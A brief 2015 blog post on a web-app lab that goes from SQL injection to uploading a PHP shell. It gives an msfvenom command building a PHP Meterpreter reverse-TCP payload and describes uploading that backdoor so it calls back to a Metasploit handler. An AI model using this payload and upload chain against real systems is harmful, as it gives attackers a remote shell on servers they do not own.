From sqli to shell

This is a fun lab which walks through getting admin privileges in a web app through sql injection to upload your own php shell. The shell described is a simple GET request to the PHP cmd function. So lets take it a little further and upload a metasploit php shell.

msfpayload is deprecated so heres the msfvenom for a meterpreter php payload:

ruby msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 > exploit.php3

set up the exploit/multi/handler in msfconsole with the proper payload and upload the php backdoor. Accessing the script will call back to the handler and start a meterpreter session.

Written on March 14, 2015